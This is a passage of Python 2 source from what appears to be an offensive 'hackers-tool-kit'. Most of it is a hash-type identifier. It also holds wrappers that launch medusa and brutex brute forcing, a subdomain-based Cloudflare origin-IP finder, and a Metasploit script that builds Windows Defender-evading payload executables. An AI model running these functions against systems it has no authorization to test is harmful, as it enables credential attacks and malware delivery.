hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm 